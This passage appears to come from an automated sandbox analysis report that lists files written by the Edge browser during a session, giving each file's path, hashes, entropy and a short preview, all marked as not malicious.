Preview:	2024/11/11-04:33:23.253 19b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/11-04:33:23.268 19b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113657
Entropy (8bit):	5.579987715213289
Encrypted:	false
SSDEEP:	1536:sa906yxPXfOrr1lhCe1+46rCjF3NlH2BoOz/0iL/rDL/rdLD:f9LyxPXfOrr1lMe1z6rWXU8iL/HL/l
MD5:	354423B7C7C8307F978045F85ECF1EC0
SHA1:	B8717D36DD44F99321C52B32B03E54E1D16B7D25
SHA-256:	4573B0E53E2953FAAB25183883D155FC3C7F691CB35EC8BCEC5BF8DF49252136
SHA-512:	641CBBE47A403BC2E5F8BAF3A1511BDD7EA348091B76F32FDFE841920CF8FEB78E6B7BA2C3A325951CAEF6F30F01B917E7F4F6F0D2E88327196E1FF11729F004
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187817
Entropy (8bit):	6.380691294791526
Encrypted:	false
SSDEEP:	3072:904flila8RSwFNx+mjPEv2BSOaasI6bnjsL/D5vVoC4vk:YSw3jGk0aJ6bYL/Vx4vk
MD5:	A1D0640D1B83A998F035B8357A160520
SHA1:	A958267B38AD78148A6AAF358381F0955BA431A7
SHA-256:	D6EA207F7357143224FA262BB17AD8BB7A79FFE282E5B4DC0564DC5E4C365E22
SHA-512:	D9DBCF52BE205E62E0417DA496DD66CEE2C925674083603327AB7FEEE3556ED06E5BEEB3400B5672478E70C608F8E7FBB65E5DE020C45D930A7D75A48C437F10
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.P........,T.8..`,.....L`.....,T...`......L`......Rc..X?....exports...Rc.S......module....Rc..b....define....Rb...,....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.....b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....S...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:REGlXAyXl/lrV/lxEYz0Rdn:iGt6xRd
MD5:	2E0ACA710837E58C0171C5E084E59415
SHA1:	6854416ECAC54B356F140F73C1C627B9E954E8C9
SHA-256:	60B24B0B5EC9AC2D975CE144CB59E2A6E552288F295F7A651BC79BC41933E80B
SHA-512:	B5EDFDDCB087FC52BEE0400F207F5CA5E97211978F334CB87D33249EA3CCDD3BA512E8C40CCDA3928E341B6BF26E05E190615FF04D66A2CB0CBF1E4045403021
Malicious:	false
Preview:	@...$a..oy retne.........................X....,................cNK.6./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:REGlXAyXl/lrV/lxEYz0Rdn:iGt6xRd
MD5:	2E0ACA710837E58C0171C5E084E59415
SHA1:	6854416ECAC54B356F140F73C1C627B9E954E8C9
SHA-256:	60B24B0B5EC9AC2D975CE144CB59E2A6E552288F295F7A651BC79BC41933E80B
SHA-512:	B5EDFDDCB087FC52BEE0400F207F5CA5E97211978F334CB87D33249EA3CCDD3BA512E8C40CCDA3928E341B6BF26E05E190615FF04D66A2CB0CBF1E4045403021
Malicious:	false
Preview:	@...$a..oy retne.........................X....,................cNK.6./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3cbae.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:REGlXAyXl/lrV/lxEYz0Rdn:iGt6xRd
MD5:	2E0ACA710837E58C0171C5E084E59415
SHA1:	6854416ECAC54B356F140F73C1C627B9E954E8C9
SHA-256:	60B24B0B5EC9AC2D975CE144CB59E2A6E552288F295F7A651BC79BC41933E80B
SHA-512:	B5EDFDDCB087FC52BEE0400F207F5CA5E97211978F334CB87D33249EA3CCDD3BA512E8C40CCDA3928E341B6BF26E05E190615FF04D66A2CB0CBF1E4045403021
Malicious:	false
Preview:	@...$a..oy retne.........................X....,................cNK.6./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5503
Entropy (8bit):	3.436935664098138
Encrypted:	false
SSDEEP:	96:eK3yKs4xkN5zYn9Kt1KiMPF9Xp+Pt+jU6tok5a5SLl9iSrk1zTNz5Kp:LyL4xkN5zYa1/E9Xp+VEU6tDE5SLl9i+
MD5:	17F6E1CF8A7F1752F9897E742FE4DCDE
SHA1:	163072FE55CD78FAF574BAA1EC0610CE98A791CE
SHA-256:	FA94BF01388A0A0991FA2A22B3FC7A6D054E45FFF007A3B4F7B16F4D78F5E152
SHA-512:	8034370CA2114F6893480AA77BAA67AF9BDB245CEC1D352B0504E54A43AA4AE6899D15374CDDA25A9DD69435D944E485909B42630876FA408D96181A978C96D5
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............)..?b................next-map-id.1.Cnamespace-845fff01_2a23_48e6_a825_590c85c1b08a-https://ntp.msn.com/.0..fv:................map-0-shd_sweeper.({.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.l.t.c.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.c.,.p.r.g.-.i.n.f.o.p.-.a.d.s.-.d.l.-.t.2.,.d.a.t.a.c.o.l.l.e.c.t.i.o.n.,.p.r.g.-.1.s.w.-.s.a.-.g.e.n.u.2.i.v.1.t.1.,.p.r.g.-.1.s.w.-.s.a.-.s.p.2.-.e.n.-.t.1.a.,.p.r.g.-.1.s.w.-.s.a.p.s.h.l.d.o.u.t.t.2.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.1.4.-.t.,.1.s.-.t.p.s.n.-.d.s.t.d.c.y.1.4.,.1.s.-.t.p.s.n.p.1.-.d.t.d.c.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.t.,.p.r.g.-.a.d.s.p.e.e.k.,.f.l.i.g.h.t.0.4.1.7._.4.,.t.r.a.f.f.i.c.-.p.r.2.-.t.s.k.b.-.c.a.r.,.p.r.g.-.p.r.2.-.t.s.k.b.-.c.a.r.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.p.r.g.-.p.r.2.-.t.r.d.i.s.c.h.i.2.,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.137684683905877
Encrypted:	false
SSDEEP:	6:HUzLTv/L4q2P923oH+TcwtrQMxIFUt8YUzLTlALJZmw+YUzLTGrDkwO923oH+TcM:+nXL4v4YebCFUt8ZnGLJ/+ZnWD5LYebf
MD5:	E20744D35F8F58BB177BDD1ADE3E80DA
SHA1:	146527138437A05CF9D8FC4BA1DDC36E5575902E
SHA-256:	CC478A6C7A5763AE64D2565689771C6C026B5B6ADB9263776A75FC88F165018A
SHA-512:	3707AEDB3059BCDCFBACEF71689980C37DE1DC16B48E92DC34D4606AC58AD859A3EB41AA316FF25F7AC7D86E1B9D7314280A496E79310CA5ADE2334774399F65
Malicious:	false
Preview:	2024/11/11-04:33:15.860 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-04:33:15.861 13b4 Recovering log #3.2024/11/11-04:33:15.863 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.137684683905877
Encrypted:	false
SSDEEP:	6:HUzLTv/L4q2P923oH+TcwtrQMxIFUt8YUzLTlALJZmw+YUzLTGrDkwO923oH+TcM:+nXL4v4YebCFUt8ZnGLJ/+ZnWD5LYebf
MD5:	E20744D35F8F58BB177BDD1ADE3E80DA
SHA1:	146527138437A05CF9D8FC4BA1DDC36E5575902E
SHA-256:	CC478A6C7A5763AE64D2565689771C6C026B5B6ADB9263776A75FC88F165018A
SHA-512:	3707AEDB3059BCDCFBACEF71689980C37DE1DC16B48E92DC34D4606AC58AD859A3EB41AA316FF25F7AC7D86E1B9D7314280A496E79310CA5ADE2334774399F65
Malicious:	false
Preview:	2024/11/11-04:33:15.860 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-04:33:15.861 13b4 Recovering log #3.2024/11/11-04:33:15.863 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375791197554494

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.808239433761795
Encrypted:	false
SSDEEP:	24:3oalHxsxQ3ZTWoyeDcpsAF4unxotLp3X2amEtG1ChqHDZcFyUmdg+QKkOAM4DtDt:3llvZTJnczFmLp2FEkChwZamGfHOp+t
MD5:	33CCA30630460B2610D7B404FB511519
SHA1:	1912D0438D15688A78E6B466EE83BADBF6B242D3
SHA-256:	94DD9ABC44D4BFD7F9990937DCA41B29E8ABBAB270018D672861B0AFF909254E
SHA-512:	E6C0E637098D2A3F30FA5EE1F5424D7F193626738689C041B33CC6DF3165E3C47A69DC3E3694495DA1BAA6CEF1F373BF91A5F1D2A6B28AD1D829D3A5A439B619
Malicious:	false
Preview:	SNSS................................"........................................................!.............................................1..,.......$...845fff01_2a23_48e6_a825_590c85c1b08a......................D.%..................................................................5..0.......&...{98952893-68FF-4A5D-A164-705C709ED3DB}...........................................edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......B.d.&..C.d.&.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.089448524561733
Encrypted:	false
SSDEEP:	6:HUzLTyq2P923oH+Tcwt7Uh2ghZIFUt8YUzL0P1Zmw+YUzL0ZRkwO923oH+Tcwt7w:+6v4YebIhHh2FUt8ZAP1/+ZA/5LYebIT
MD5:	1384104B1407333E39E6558745398EF2
SHA1:	482C6454CE7AF5BAADA3724C272B6BC9E293849E
SHA-256:	998DDADFFDAD69A04ECCDB6CF07EAA4B1F05F36BDC8F8654B730763E35D592BC
SHA-512:	38A06FEBCB95FA17BB7F05B78FD6F64FE1E7F432D87862236A53C2257626C163385FB086954089028E835CB3675A64951AAB27275281C6DF55E8DC71E8F097C7
Malicious:	false
Preview:	2024/11/11-04:33:15.017 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-04:33:15.018 1dc0 Recovering log #3.2024/11/11-04:33:15.018 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.089448524561733
Encrypted:	false
SSDEEP:	6:HUzLTyq2P923oH+Tcwt7Uh2ghZIFUt8YUzL0P1Zmw+YUzL0ZRkwO923oH+Tcwt7w:+6v4YebIhHh2FUt8ZAP1/+ZA/5LYebIT
MD5:	1384104B1407333E39E6558745398EF2
SHA1:	482C6454CE7AF5BAADA3724C272B6BC9E293849E
SHA-256:	998DDADFFDAD69A04ECCDB6CF07EAA4B1F05F36BDC8F8654B730763E35D592BC
SHA-512:	38A06FEBCB95FA17BB7F05B78FD6F64FE1E7F432D87862236A53C2257626C163385FB086954089028E835CB3675A64951AAB27275281C6DF55E8DC71E8F097C7
Malicious:	false
Preview:	2024/11/11-04:33:15.017 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-04:33:15.018 1dc0 Recovering log #3.2024/11/11-04:33:15.018 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.229933888508239
Encrypted:	false
SSDEEP:	12:+g4v4YebvqBQFUt8ZHJ/+ZKND5LYebvqBvJ:+X4YebvZg8ZoKXLYebvk
MD5:	9CF8EFC24BF70558146560D66EE01A19
SHA1:	D90E633F34CB57D84F4043712AA0CCF41700AB33
SHA-256:	06E3A9086618ECE110A9BD0E109E3EEB34973E6D1499115BB6D44B70A6B408BD
SHA-512:	A72C2E227AA3E71695C347A7AC0D402E95B203B4B8134CFA01474BAECB8709DA1C4473FB97BA03A6F9998EFE8FC5182C6426564B8D173C676BA7560C553055CB
Malicious:	false
Preview:	2024/11/11-04:33:15.898 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/11-04:33:15.899 13b4 Recovering log #3.2024/11/11-04:33:15.902 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.229933888508239
Encrypted:	false
SSDEEP:	12:+g4v4YebvqBQFUt8ZHJ/+ZKND5LYebvqBvJ:+X4YebvZg8ZoKXLYebvk
MD5:	9CF8EFC24BF70558146560D66EE01A19
SHA1:	D90E633F34CB57D84F4043712AA0CCF41700AB33
SHA-256:	06E3A9086618ECE110A9BD0E109E3EEB34973E6D1499115BB6D44B70A6B408BD
SHA-512:	A72C2E227AA3E71695C347A7AC0D402E95B203B4B8134CFA01474BAECB8709DA1C4473FB97BA03A6F9998EFE8FC5182C6426564B8D173C676BA7560C553055CB
Malicious:	false
Preview:	2024/11/11-04:33:15.898 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/11-04:33:15.899 13b4 Recovering log #3.2024/11/11-04:33:15.902 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\332f5916-3b02-4b10-9791-345fb7777ea2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3ec08cca-1b51-4323-afa7-5189767aa663.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF380aa.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38cb1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF44080.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
